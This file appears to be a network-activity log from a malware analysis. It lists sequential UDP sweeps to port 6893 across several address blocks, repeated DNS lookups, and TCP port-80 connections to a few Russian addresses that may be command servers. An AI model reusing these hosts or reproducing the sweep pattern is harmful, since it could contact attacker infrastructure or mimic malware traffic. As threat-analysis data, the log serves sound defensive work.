FR 87.98.179.20:6893 udp
FR 87.98.179.21:6893 udp
FR 87.98.179.22:6893 udp
FR 87.98.179.23:6893 udp
FR 87.98.179.24:6893 udp
FR 87.98.179.25:6893 udp
FR 87.98.179.26:6893 udp
FR 87.98.179.27:6893 udp
FR 87.98.179.28:6893 udp
FR 87.98.179.29:6893 udp
FR 87.98.179.30:6893 udp
FR 87.98.179.31:6893 udp
FR 87.98.179.32:6893 udp
FR 87.98.179.33:6893 udp
FR 87.98.179.34:6893 udp
FR 87.98.179.35:6893 udp
FR 87.98.179.36:6893 udp
FR 87.98.179.37:6893 udp
FR 87.98.179.38:6893 udp
FR 87.98.179.39:6893 udp
FR 87.98.179.40:6893 udp
FR 87.98.179.41:6893 udp
FR 87.98.179.42:6893 udp
FR 87.98.179.43:6893 udp
FR 87.98.179.44:6893 udp
FR 87.98.179.45:6893 udp
FR 87.98.179.46:6893 udp
FR 87.98.179.47:6893 udp
FR 87.98.179.48:6893 udp
FR 87.98.179.49:6893 udp
FR 87.98.179.50:6893 udp
FR 87.98.179.51:6893 udp
FR 87.98.179.52:6893 udp
FR 87.98.179.53:6893 udp
FR 87.98.179.54:6893 udp
FR 87.98.179.55:6893 udp
FR 87.98.179.56:6893 udp
FR 87.98.179.57:6893 udp
FR 87.98.179.58:6893 udp
FR 87.98.179.59:6893 udp
FR 87.98.179.60:6893 udp
FR 87.98.179.61:6893 udp
FR 87.98.179.62:6893 udp
FR 87.98.179.63:6893 udp
FR 87.98.179.64:6893 udp
FR 87.98.179.65:6893 udp
FR 87.98.179.66:6893 udp
FR 87.98.179.67:6893 udp
FR 87.98.179.68:6893 udp
FR 87.98.179.69:6893 udp
FR 87.98.179.70:6893 udp
FR 87.98.179.71:6893 udp
FR 87.98.179.72:6893 udp
FR 87.98.179.73:6893 udp
FR 87.98.179.74:6893 udp
FR 87.98.179.75:6893 udp
FR 87.98.179.76:6893 udp
FR 87.98.179.77:6893 udp
FR 87.98.179.78:6893 udp
FR 87.98.179.79:6893 udp
FR 87.98.179.80:6893 udp
FR 87.98.179.81:6893 udp
FR 87.98.179.82:6893 udp
FR 87.98.179.83:6893 udp
FR 87.98.179.84:6893 udp
FR 87.98.179.85:6893 udp
FR 87.98.179.86:6893 udp
FR 87.98.179.87:6893 udp
FR 87.98.179.88:6893 udp
FR 87.98.179.89:6893 udp
FR 87.98.179.90:6893 udp
FR 87.98.179.91:6893 udp
FR 87.98.179.92:6893 udp
FR 87.98.179.93:6893 udp
FR 87.98.179.94:6893 udp
FR 87.98.179.95:6893 udp
FR 87.98.179.96:6893 udp
FR 87.98.179.97:6893 udp
FR 87.98.179.98:6893 udp
FR 87.98.179.99:6893 udp
FR 87.98.179.100:6893 udp
FR 87.98.179.101:6893 udp
FR 87.98.179.102:6893 udp
FR 87.98.179.103:6893 udp
FR 87.98.179.104:6893 udp
FR 87.98.179.105:6893 udp
FR 87.98.179.106:6893 udp
FR 87.98.179.107:6893 udp
FR 87.98.179.108:6893 udp
FR 87.98.179.109:6893 udp
FR 87.98.179.110:6893 udp
FR 87.98.179.111:6893 udp
FR 87.98.179.112:6893 udp
FR 87.98.179.113:6893 udp
FR 87.98.179.114:6893 udp
FR 87.98.179.115:6893 udp
FR 87.98.179.116:6893 udp
FR 87.98.179.117:6893 udp
FR 87.98.179.118:6893 udp
FR 87.98.179.119:6893 udp
FR 87.98.179.120:6893 udp
FR 87.98.179.121:6893 udp
FR 87.98.179.122:6893 udp
FR 87.98.179.123:6893 udp
FR 87.98.179.124:6893 udp
FR 87.98.179.125:6893 udp
FR 87.98.179.126:6893 udp
FR 87.98.179.127:6893 udp
FR 87.98.179.128:6893 udp
FR 87.98.179.129:6893 udp
FR 87.98.179.130:6893 udp
FR 87.98.179.131:6893 udp
FR 87.98.179.132:6893 udp
FR 87.98.179.133:6893 udp
FR 87.98.179.134:6893 udp
FR 87.98.179.135:6893 udp
FR 87.98.179.136:6893 udp
FR 87.98.179.137:6893 udp
FR 87.98.179.138:6893 udp
FR 87.98.179.139:6893 udp
FR 87.98.179.140:6893 udp
FR 87.98.179.141:6893 udp
FR 87.98.179.142:6893 udp
FR 87.98.179.143:6893 udp
FR 87.98.179.144:6893 udp
FR 87.98.179.145:6893 udp
FR 87.98.179.146:6893 udp
FR 87.98.179.147:6893 udp
FR 87.98.179.148:6893 udp
FR 87.98.179.149:6893 udp
FR 87.98.179.150:6893 udp
FR 87.98.179.151:6893 udp
FR 87.98.179.152:6893 udp
FR 87.98.179.153:6893 udp
FR 87.98.179.154:6893 udp
FR 87.98.179.155:6893 udp
FR 87.98.179.156:6893 udp
FR 87.98.179.157:6893 udp
FR 87.98.179.158:6893 udp
FR 87.98.179.159:6893 udp
FR 87.98.179.160:6893 udp
FR 87.98.179.161:6893 udp
FR 87.98.179.162:6893 udp
FR 87.98.179.163:6893 udp
FR 87.98.179.164:6893 udp
FR 87.98.179.165:6893 udp
FR 87.98.179.166:6893 udp
FR 87.98.179.167:6893 udp
FR 87.98.179.168:6893 udp
FR 87.98.179.169:6893 udp
FR 87.98.179.170:6893 udp
FR 87.98.179.171:6893 udp
FR 87.98.179.172:6893 udp
FR 87.98.179.173:6893 udp
FR 87.98.179.174:6893 udp
FR 87.98.179.175:6893 udp
FR 87.98.179.176:6893 udp
FR 87.98.179.177:6893 udp
FR 87.98.179.178:6893 udp
FR 87.98.179.179:6893 udp
FR 87.98.179.180:6893 udp
FR 87.98.179.181:6893 udp
FR 87.98.179.182:6893 udp
FR 87.98.179.183:6893 udp
FR 87.98.179.184:6893 udp
FR 87.98.179.185:6893 udp
FR 87.98.179.186:6893 udp
FR 87.98.179.187:6893 udp
FR 87.98.179.188:6893 udp
FR 87.98.179.189:6893 udp
FR 87.98.179.190:6893 udp
FR 87.98.179.191:6893 udp
FR 87.98.179.192:6893 udp
FR 87.98.179.193:6893 udp
FR 87.98.179.194:6893 udp
FR 87.98.179.195:6893 udp
FR 87.98.179.196:6893 udp
FR 87.98.179.197:6893 udp
FR 87.98.179.198:6893 udp
FR 87.98.179.199:6893 udp
FR 87.98.179.200:6893 udp
FR 87.98.179.201:6893 udp
FR 87.98.179.202:6893 udp
FR 87.98.179.203:6893 udp
FR 87.98.179.204:6893 udp
FR 87.98.179.205:6893 udp
FR 87.98.179.206:6893 udp
FR 87.98.179.207:6893 udp
FR 87.98.179.208:6893 udp
FR 87.98.179.209:6893 udp
FR 87.98.179.210:6893 udp
FR 87.98.179.211:6893 udp
FR 87.98.179.212:6893 udp
FR 87.98.179.213:6893 udp
FR 87.98.179.214:6893 udp
FR 87.98.179.215:6893 udp
FR 87.98.179.216:6893 udp
FR 87.98.179.217:6893 udp
FR 87.98.179.218:6893 udp
FR 87.98.179.219:6893 udp
FR 87.98.179.220:6893 udp
FR 87.98.179.221:6893 udp
FR 87.98.179.222:6893 udp
FR 87.98.179.223:6893 udp
FR 87.98.179.224:6893 udp
FR 87.98.179.225:6893 udp
FR 87.98.179.226:6893 udp
FR 87.98.179.227:6893 udp
FR 87.98.179.228:6893 udp
FR 87.98.179.229:6893 udp
FR 87.98.179.230:6893 udp
FR 87.98.179.231:6893 udp
FR 87.98.179.232:6893 udp
FR 87.98.179.233:6893 udp
FR 87.98.179.234:6893 udp
FR 87.98.179.235:6893 udp
FR 87.98.179.236:6893 udp
FR 87.98.179.237:6893 udp
FR 87.98.179.238:6893 udp
FR 87.98.179.239:6893 udp
FR 87.98.179.240:6893 udp
FR 87.98.179.241:6893 udp
FR 87.98.179.242:6893 udp
FR 87.98.179.243:6893 udp
FR 87.98.179.244:6893 udp
FR 87.98.179.245:6893 udp
FR 87.98.179.246:6893 udp
FR 87.98.179.247:6893 udp
FR 87.98.179.248:6893 udp
FR 87.98.179.249:6893 udp
FR 87.98.179.250:6893 udp
FR 87.98.179.251:6893 udp
FR 87.98.179.252:6893 udp
FR 87.98.179.253:6893 udp
FR 87.98.179.254:6893 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 87.98.179.255:6893 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
RU 91.218.114.79:80 tcp
RU 91.218.114.79:80 tcp
RU 91.218.114.26:80 tcp
RU 91.218.114.31:80 tcp
RU 91.218.114.4:80 tcp
US 8.8.8.8:53 udp
N/A 93.107.12.0:6893 udp
N/A 93.107.12.1:6893 udp
N/A 93.107.12.2:6893 udp
N/A 93.107.12.3:6893 udp
N/A 93.107.12.4:6893 udp
N/A 93.107.12.5:6893 udp
N/A 93.107.12.6:6893 udp
N/A 93.107.12.7:6893 udp
N/A 93.107.12.8:6893 udp
N/A 93.107.12.9:6893 udp
N/A 93.107.12.10:6893 udp
N/A 93.107.12.11:6893 udp
N/A 93.107.12.12:6893 udp
N/A 93.107.12.13:6893 udp
N/A 93.107.12.14:6893 udp
N/A 93.107.12.15:6893 udp
N/A 93.107.12.16:6893 udp
N/A 93.107.12.17:6893 udp
N/A 93.107.12.18:6893 udp
N/A 93.107.12.19:6893 udp
N/A 93.107.12.20:6893 udp
N/A 93.107.12.21:6893 udp
N/A 93.107.12.22:6893 udp
N/A 93.107.12.23:6893 udp
N/A 93.107.12.24:6893 udp
N/A 93.107.12.25:6893 udp
N/A 93.107.12.26:6893 udp
N/A 93.107.12.27:6893 udp
N/A 93.107.12.28:6893 udp
N/A 93.107.12.29:6893 udp
N/A 93.107.12.30:6893 udp
N/A 93.107.12.31:6893 udp
N/A 95.1.200.0:6893 udp
N/A 95.1.200.1:6893 udp
N/A 95.1.200.2:6893 udp
N/A 95.1.200.3:6893 udp
N/A 95.1.200.4:6893 udp
N/A 95.1.200.5:6893 udp
N/A 95.1.200.6:6893 udp
N/A 95.1.200.7:6893 udp
N/A 95.1.200.8:6893 udp
N/A 95.1.200.9:6893 udp
N/A 95.1.200.10:6893 udp
N/A 95.1.200.11:6893 udp
N/A 95.1.200.12:6893 udp
N/A 95.1.200.13:6893 udp
N/A 95.1.200.14:6893 udp
N/A 95.1.200.15:6893 udp
N/A 95.1.200.16:6893 udp
N/A 95.1.200.17:6893 udp
N/A 95.1.200.18:6893 udp
N/A 95.1.200.19:6893 udp
N/A 95.1.200.20:6893 udp
N/A 95.1.200.21:6893 udp
N/A 95.1.200.22:6893 udp
N/A 95.1.200.23:6893 udp
N/A 95.1.200.24:6893 udp
N/A 95.1.200.25:6893 udp
N/A 95.1.200.26:6893 udp
N/A 95.1.200.27:6893 udp
N/A 95.1.200.28:6893 udp
N/A 95.1.200.29:6893 udp
N/A 95.1.200.30:6893 udp
N/A 95.1.200.31:6893 udp
N/A 87.98.176.0:6893 udp
N/A 87.98.176.1:6893 udp
N/A 87.98.176.2:6893 udp
N/A 87.98.176.3:6893 udp
N/A 87.98.176.4:6893 udp
N/A 87.98.176.5:6893 udp
N/A 87.98.176.6:6893 udp
N/A 87.98.176.7:6893 udp
N/A 87.98.176.8:6893 udp
N/A 87.98.176.9:6893 udp
N/A 87.98.176.10:6893 udp
N/A 87.98.176.11:6893 udp
N/A 87.98.176.12:6893 udp
N/A 87.98.176.13:6893 udp
N/A 87.98.176.14:6893 udp
N/A 87.98.176.15:6893 udp
N/A 87.98.176.16:6893 udp
N/A 87.98.176.17:6893 udp
N/A 87.98.176.18:6893 udp
N/A 87.98.176.19:6893 udp
N/A 87.98.176.20:6893 udp
N/A 87.98.176.21:6893 udp
N/A 87.98.176.22:6893 udp
N/A 87.98.176.23:6893 udp
N/A 87.98.176.24:6893 udp
N/A 87.98.176.25:6893 udp
N/A 87.98.176.26:6893 udp
N/A 87.98.176.27:6893 udp
N/A 87.98.176.28:6893 udp
N/A 87.98.176.29:6893 udp
N/A 87.98.176.30:6893 udp
N/A 87.98.176.31:6893 udp
N/A 87.98.176.32:6893 udp
N/A 87.98.176.33:6893 udp
N/A 87.98.176.34:6893 udp
N/A 87.98.176.35:6893 udp
N/A 87.98.176.36:6893 udp
N/A 87.98.176.37:6893 udp
N/A 87.98.176.38:6893 udp
N/A 87.98.176.39:6893 udp
N/A 87.98.176.40:6893 udp
N/A 87.98.176.41:6893 udp
N/A 87.98.176.42:6893 udp
N/A 87.98.176.43:6893 udp
N/A 87.98.176.44:6893 udp
N/A 87.98.176.45:6893 udp
N/A 87.98.176.46:6893 udp
N/A 87.98.176.47:6893 udp
N/A 87.98.176.48:6893 udp
N/A 87.98.176.49:6893 udp
N/A 87.98.176.50:6893 udp
N/A 87.98.176.51:6893 udp
N/A 87.98.176.52:6893 udp
N/A 87.98.176.53:6893 udp
N/A 87.98.176.54:6893 udp
N/A 87.98.176.55:6893 udp
N/A 87.98.176.56:6893 udp
N/A 87.98.176.57:6893 udp
N/A 87.98.176.58:6893 udp
N/A 87.98.176.59:6893 udp
N/A 87.98.176.60:6893 udp
N/A 87.98.176.61:6893 udp
N/A 87.98.176.62:6893 udp
N/A 87.98.176.63:6893 udp
N/A 87.98.176.64:6893 udp
N/A 87.98.176.65:6893 udp
N/A 87.98.176.66:6893 udp
N/A 87.98.176.67:6893 udp
N/A 87.98.176.68:6893 udp
N/A 87.98.176.69:6893 udp
N/A 87.98.176.70:6893 udp
N/A 87.98.176.71:6893 udp
N/A 87.98.176.72:6893 udp
N/A 87.98.176.73:6893 udp
N/A 87.98.176.74:6893 udp
N/A 87.98.176.75:6893 udp
N/A 87.98.176.76:6893 udp
N/A 87.98.176.77:6893 udp
N/A 87.98.176.78:6893 udp
N/A 87.98.176.79:6893 udp
N/A 87.98.176.80:6893 udp
N/A 87.98.176.81:6893 udp
N/A 87.98.176.82:6893 udp
N/A 87.98.176.83:6893 udp
N/A 87.98.176.84:6893 udp
N/A 87.98.176.85:6893 udp
N/A 87.98.176.86:6893 udp
N/A 87.98.176.87:6893 udp
N/A 87.98.176.88:6893 udp
N/A 87.98.176.89:6893 udp
N/A 87.98.176.90:6893 udp
N/A 87.98.176.91:6893 udp
N/A 87.98.176.92:6893 udp
N/A 87.98.176.93:6893 udp
N/A 87.98.176.94:6893 udp
N/A 87.98.176.95:6893 udp
N/A 87.98.176.96:6893 udp
N/A 87.98.176.97:6893 udp
N/A 87.98.176.98:6893 udp
N/A 87.98.176.99:6893 udp
N/A 87.98.176.100:6893 udp
N/A 87.98.176.101:6893 udp
N/A 87.98.176.102:6893 udp
N/A 87.98.176.103:6893 udp
N/A 87.98.176.104:6893 udp
N/A 87.98.176.105:6893 udp
N/A 87.98.176.106:6893 udp
N/A 87.98.176.107:6893 udp
N/A 87.98.176.108:6893 udp
N/A 87.98.176.109:6893 udp
N/A 87.98.176.110:6893 udp
N/A 87.98.176.111:6893 udp
N/A 87.98.176.112:6893 udp
N/A 87.98.176.113:6893 udp
N/A 87.98.176.114:6893 udp
N/A 87.98.176.115:6893 udp
N/A 87.98.176.116:6893 udp
N/A 87.98.176.117:6893 udp
N/A 87.98.176.118:6893 udp
N/A 87.98.176.119:6893 udp
N/A 87.98.176.120:6893 udp
N/A 87.98.176.121:6893 udp
N/A 87.98.176.122:6893 udp
N/A 87.98.176.123:6893 udp
N/A 87.98.176.124:6893 udp
N/A 87.98.176.125:6893 udp
N/A 87.98.176.126:6893 udp
N/A 87.98.176.127:6893 udp
N/A 87.98.176.128:6893 udp
N/A 87.98.176.129:6893 udp
N/A 87.98.176.130:6893 udp
N/A 87.98.176.131:6893 udp
N/A 87.98.176.132:6893 udp
N/A 87.98.176.133:6893 udp
N/A 87.98.176.134:6893 udp
N/A 87.98.176.135:6893 udp
N/A 87.98.176.136:6893 udp
N/A 87.98.176.137:6893 udp
N/A 87.98.176.138:6893 udp
N/A 87.98.176.139:6893 udp
N/A 87.98.176.140:6893 udp
N/A 87.98.176.141:6893 udp
N/A 87.98.176.142:6893 udp
N/A 87.98.176.143:6893 udp
N/A 87.98.176.144:6893 udp
N/A 87.98.176.145:6893 udp
N/A 87.98.176.146:6893 udp
N/A 87.98.176.147:6893 udp
N/A 87.98.176.148:6893 udp
N/A 87.98.176.149:6893 udp
N/A 87.98.176.150:6893 udp
N/A 87.98.176.151:6893 udp
N/A 87.98.176.152:6893 udp
N/A 87.98.176.153:6893 udp
N/A 87.98.176.154:6893 udp
N/A 87.98.176.155:6893 udp
N/A 87.98.176.156:6893 udp
N/A 87.98.176.157:6893 udp
N/A 87.98.176.158:6893 udp
N/A 87.98.176.159:6893 udp
N/A 87.98.176.160:6893 udp
N/A 87.98.176.161:6893 udp
N/A 87.98.176.162:6893 udp
N/A 87.98.176.163:6893 udp
N/A 87.98.176.164:6893 udp
N/A 87.98.176.165:6893 udp
N/A 87.98.176.166:6893 udp
N/A 87.98.176.167:6893 udp
N/A 87.98.176.168:6893 udp
N/A 87.98.176.169:6893 udp
N/A 87.98.176.170:6893 udp
N/A 87.98.176.171:6893 udp
N/A 87.98.176.172:6893 udp
N/A 87.98.176.173:6893 udp
N/A 87.98.176.174:6893 udp
N/A 87.98.176.175:6893 udp
N/A 87.98.176.176:6893 udp
N/A 87.98.176.177:6893 udp
N/A 87.98.176.178:6893 udp
N/A 87.98.176.179:6893 udp
N/A 87.98.176.180:6893 udp
N/A 87.98.176.181:6893 udp
N/A 87.98.176.182:6893 udp
N/A 87.98.176.183:6893 udp
N/A 87.98.176.184:6893 udp
N/A 87.98.176.185:6893 udp
N/A 87.98.176.186:6893 udp
N/A 87.98.176.187:6893 udp
N/A 87.98.176.188:6893 udp
N/A 87.98.176.189:6893 udp
N/A 87.98.176.190:6893 udp
N/A 87.98.176.191:6893 udp
N/A 87.98.176.192:6893 udp
N/A 87.98.176.193:6893 udp
N/A 87.98.176.194:6893 udp
N/A 87.98.176.195:6893 udp
N/A 87.98.176.196:6893 udp
N/A 87.98.176.197:6893 udp
N/A 87.98.176.198:6893 udp
N/A 87.98.176.199:6893 udp
N/A 87.98.176.200:6893 udp
N/A 87.98.176.201:6893 udp
N/A 87.98.176.202:6893 udp
N/A 87.98.176.203:6893 udp
N/A 87.98.176.204:6893 udp
N/A 87.98.176.205:6893 udp
N/A 87.98.176.206:6893 udp
N/A 87.98.176.207:6893 udp
N/A 87.98.176.208:6893 udp
N/A 87.98.176.209:6893 udp
N/A 87.98.176.210:6893 udp
N/A 87.98.176.211:6893 udp
N/A 87.98.176.212:6893 udp
N/A 87.98.176.213:6893 udp
N/A 87.98.176.214:6893 udp
N/A 87.98.176.215:6893 udp
N/A 87.98.176.216:6893 udp
N/A 87.98.176.217:6893 udp
N/A 87.98.176.218:6893 udp
N/A 87.98.176.219:6893 udp
N/A 87.98.176.220:6893 udp
N/A 87.98.176.221:6893 udp
N/A 87.98.176.222:6893 udp
N/A 87.98.176.223:6893 udp
N/A 87.98.176.224:6893 udp
N/A 87.98.176.225:6893 udp
N/A 87.98.176.226:6893 udp
N/A 87.98.176.227:6893 udp
N/A 87.98.176.228:6893 udp
N/A 87.98.176.229:6893 udp
N/A 87.98.176.230:6893 udp
N/A 87.98.176.231:6893 udp
N/A 87.98.176.232:6893 udp
N/A 87.98.176.233:6893 udp
N/A 87.98.176.234:6893 udp
N/A 87.98.176.235:6893 udp
N/A 87.98.176.236:6893 udp
N/A 87.98.176.237:6893 udp
N/A 87.98.176.238:6893 udp
N/A 87.98.176.239:6893 udp
N/A 87.98.176.240:6893 udp
N/A 87.98.176.241:6893 udp
N/A 87.98.176.242:6893 udp
N/A 87.98.176.243:6893 udp
N/A 87.98.176.244:6893 udp
N/A 87.98.176.245:6893 udp
N/A 87.98.176.246:6893 udp
N/A 87.98.176.247:6893 udp
N/A 87.98.176.248:6893 udp
N/A 87.98.176.249:6893 udp
N/A 87.98.176.250:6893 udp
N/A 87.98.176.251:6893 udp
N/A 87.98.176.252:6893 udp
N/A 87.98.176.253:6893 udp
N/A 87.98.176.254:6893 udp
RU 92.63.107.12:80 tcp
N/A 87.98.176.255:6893 udp
N/A 87.98.177.0:6893 udp
N/A 87.98.177.1:6893 udp
N/A 87.98.177.2:6893 udp
N/A 87.98.177.3:6893 udp
N/A 87.98.177.4:6893 udp
N/A 87.98.177.5:6893 udp
N/A 87.98.177.6:6893 udp
N/A 87.98.177.7:6893 udp
N/A 87.98.177.8:6893 udp
N/A 87.98.177.9:6893 udp
N/A 87.98.177.10:6893 udp
N/A 87.98.177.11:6893 udp
N/A 87.98.177.12:6893 udp
N/A 87.98.177.13:6893 udp
N/A 87.98.177.14:6893 udp
N/A 87.98.177.15:6893 udp
N/A 87.98.177.16:6893 udp
N/A 87.98.177.17:6893 udp
N/A 87.98.177.18:6893 udp
N/A 87.98.177.19:6893 udp
N/A 87.98.177.20:6893 udp
N/A 87.98.177.21:6893 udp
N/A 87.98.177.22:6893 udp
N/A 87.98.177.23:6893 udp
N/A 87.98.177.24:6893 udp
N/A 87.98.177.25:6893 udp
N/A 87.98.177.26:6893 udp
N/A 87.98.177.27:6893 udp
N/A 87.98.177.28:6893 udp
N/A 87.98.177.29:6893 udp
N/A 87.98.177.30:6893 udp
N/A 87.98.177.31:6893 udp
N/A 87.98.177.32:6893 udp
N/A 87.98.177.33:6893 udp
N/A 87.98.177.34:6893 udp
N/A 87.98.177.35:6893 udp
N/A 87.98.177.36:6893 udp
N/A 87.98.177.37:6893 udp
N/A 87.98.177.38:6893 udp
N/A 87.98.177.39:6893 udp
N/A 87.98.177.40:6893 udp
N/A 87.98.177.41:6893 udp
N/A 87.98.177.42:6893 udp
N/A 87.98.177.43:6893 udp
N/A 87.98.177.44:6893 udp
N/A 87.98.177.45:6893 udp
N/A 87.98.177.46:6893 udp
N/A 87.98.177.47:6893 udp
N/A 87.98.177.48:6893 udp
N/A 87.98.177.49:6893 udp
N/A 87.98.177.50:6893 udp
N/A 87.98.177.51:6893 udp
N/A 87.98.177.52:6893 udp
N/A 87.98.177.53:6893 udp
N/A 87.98.177.54:6893 udp
N/A 87.98.177.55:6893 udp
N/A 87.98.177.56:6893 udp
N/A 87.98.177.57:6893 udp
N/A 87.98.177.58:6893 udp
N/A 87.98.177.59:6893 udp
N/A 87.98.177.60:6893 udp
N/A 87.98.177.61:6893 udp
N/A 87.98.177.62:6893 udp
N/A 87.98.177.63:6893 udp
N/A 87.98.177.64:6893 udp
N/A 87.98.177.65:6893 udp
N/A 87.98.177.66:6893 udp
N/A 87.98.177.67:6893 udp
N/A 87.98.177.68:6893 udp
N/A 87.98.177.69:6893 udp
N/A 87.98.177.70:6893 udp
N/A 87.98.177.71:6893 udp
N/A 87.98.177.72:6893 udp
N/A 87.98.177.73:6893 udp
N/A 87.98.177.74:6893 udp
N/A 87.98.177.75:6893 udp
N/A 87.98.177.76:6893 udp
N/A 87.98.177.77:6893 udp
N/A 87.98.177.78:6893 udp
N/A 87.98.177.79:6893 udp
N/A 87.98.177.80:6893 udp
N/A 87.98.177.81:6893 udp
N/A 87.98.177.82:6893 udp
N/A 87.98.177.83:6893 udp
N/A 87.98.177.84:6893 udp
N/A 87.98.177.85:6893 udp
N/A 87.98.177.86:6893 udp
N/A 87.98.177.87:6893 udp
N/A 87.98.177.88:6893 udp
N/A 87.98.177.89:6893 udp
N/A 87.98.177.90:6893 udp
N/A 87.98.177.91:6893 udp
N/A 87.98.177.92:6893 udp
N/A 87.98.177.93:6893 udp
N/A 87.98.177.94:6893 udp
N/A 87.98.177.95:6893 udp
N/A 87.98.177.96:6893 udp
N/A 87.98.177.97:6893 udp
N/A 87.98.177.98:6893 udp
N/A 87.98.177.99:6893 udp
N/A 87.98.177.100:6893 udp
N/A 87.98.177.101:6893 udp
N/A 87.98.177.102:6893 udp
N/A 87.98.177.103:6893 udp
N/A 87.98.177.104:6893 udp
N/A 87.98.177.105:6893 udp
N/A 87.98.177.106:6893 udp
N/A 87.98.177.107:6893 udp
N/A 87.98.177.108:6893 udp
N/A 87.98.177.109:6893 udp
N/A 87.98.177.110:6893 udp
N/A 87.98.177.111:6893 udp
N/A 87.98.177.112:6893 udp
N/A 87.98.177.113:6893 udp
N/A 87.98.177.114:6893 udp
N/A 87.98.177.115:6893 udp
N/A 87.98.177.116:6893 udp
N/A 87.98.177.117:6893 udp
N/A 87.98.177.118:6893 udp
N/A 87.98.177.119:6893 udp
N/A 87.98.177.120:6893 udp
N/A 87.98.177.121:6893 udp
N/A 87.98.177.122:6893 udp
N/A 87.98.177.123:6893 udp
N/A 87.98.177.124:6893 udp
N/A 87.98.177.125:6893 udp
N/A 87.98.177.126:6893 udp
N/A 87.98.177.127:6893 udp
N/A 87.98.177.128:6893 udp
N/A 87.98.177.129:6893 udp
N/A 87.98.177.130:6893 udp
N/A 87.98.177.131:6893 udp
N/A 87.98.177.132:6893 udp
N/A 87.98.177.133:6893 udp
N/A 87.98.177.134:6893 udp
N/A 87.98.177.135:6893 udp
N/A 87.98.177.136:6893 udp
N/A 87.98.177.137:6893 udp
N/A 87.98.177.138:6893 udp
N/A 87.98.177.139:6893 udp
N/A 87.98.177.140:6893 udp
N/A 87.98.177.141:6893 udp
N/A 87.98.177.142:6893 udp
N/A 87.98.177.143:6893 udp
N/A 87.98.177.144:6893 udp
N/A 87.98.177.145:6893 udp
N/A 87.98.177.146:6893 udp
N/A 87.98.177.147:6893 udp
N/A 87.98.177.148:6893 udp
N/A 87.98.177.149:6893 udp
N/A 87.98.177.150:6893 udp
N/A 87.98.177.151:6893 udp
N/A 87.98.177.152:6893 udp
N/A 87.98.177.153:6893 udp
N/A 87.98.177.154:6893 udp
N/A 87.98.177.155:6893 udp
N/A 87.98.177.156:6893 udp
N/A 87.98.177.157:6893 udp
N/A 87.98.177.158:6893 udp
N/A 87.98.177.159:6893 udp
N/A 87.98.177.160:6893 udp
N/A 87.98.177.161:6893 udp
N/A 87.98.177.162:6893 udp
N/A 87.98.177.163:6893 udp
N/A 87.98.177.164:6893 udp
N/A 87.98.177.165:6893 udp
N/A 87.98.177.166:6893 udp
N/A 87.98.177.167:6893 udp
N/A 87.98.177.168:6893 udp
N/A 87.98.177.169:6893 udp
N/A 87.98.177.170:6893 udp
N/A 87.98.177.171:6893 udp
N/A 87.98.177.172:6893 udp
N/A 87.98.177.173:6893 udp
N/A 87.98.177.174:6893 udp
N/A 87.98.177.175:6893 udp
N/A 87.98.177.176:6893 udp
N/A 87.98.177.177:6893 udp
N/A 87.98.177.178:6893 udp
N/A 87.98.177.179:6893 udp
N/A 87.98.177.180:6893 udp
N/A 87.98.177.181:6893 udp
N/A 87.98.177.182:6893 udp
N/A 87.98.177.183:6893 udp
N/A 87.98.177.184:6893 udp
N/A 87.98.177.185:6893 udp
N/A 87.98.177.186:6893 udp
N/A 87.98.177.187:6893 udp
N/A 87.98.177.188:6893 udp
N/A 87.98.177.189:6893 udp
N/A 87.98.177.190:6893 udp
N/A 87.98.177.191:6893 udp
N/A 87.98.177.192:6893 udp
N/A 87.98.177.193:6893 udp
N/A 87.98.177.194:6893 udp
N/A 87.98.177.195:6893 udp
N/A 87.98.177.196:6893 udp
N/A 87.98.177.197:6893 udp
N/A 87.98.177.198:6893 udp
N/A 87.98.177.199:6893 udp
N/A 87.98.177.200:6893 udp
N/A 87.98.177.201:6893 udp
N/A 87.98.177.202:6893 udp
N/A 87.98.177.203:6893 udp
N/A 87.98.177.204:6893 udp
N/A 87.98.177.205:6893 udp
N/A 87.98.177.206:6893 udp
N/A 87.98.177.207:6893 udp
N/A 87.98.177.208:6893 udp
N/A 87.98.177.209:6893 udp
N/A 87.98.177.210:6893 udp
N/A 87.98.177.211:6893 udp
N/A 87.98.177.212:6893 udp
N/A 87.98.177.213:6893 udp
N/A 87.98.177.214:6893 udp
N/A 87.98.177.215:6893 udp
N/A 87.98.177.216:6893 udp
N/A 87.98.177.217:6893 udp
N/A 87.98.177.218:6893 udp
N/A 87.98.177.219:6893 udp
N/A 87.98.177.220:6893 udp
N/A 87.98.177.221:6893 udp
N/A 87.98.177.222:6893 udp
N/A 87.98.177.223:6893 udp
N/A 87.98.177.224:6893 udp
N/A 87.98.177.225:6893 udp
N/A 87.98.177.226:6893 udp
N/A 87.98.177.227:6893 udp
N/A 87.98.177.228:6893 udp
N/A 87.98.177.229:6893 udp
N/A 87.98.177.230:6893 udp
N/A 87.98.177.231:6893 udp
N/A 87.98.177.232:6893 udp
N/A 87.98.177.233:6893 udp
N/A 87.98.177.234:6893 udp
N/A 87.98.177.235:6893 udp
N/A 87.98.177.236:6893 udp
N/A 87.98.177.237:6893 udp
N/A 87.98.177.238:6893 udp
N/A 87.98.177.239:6893 udp
N/A 87.98.177.240:6893 udp
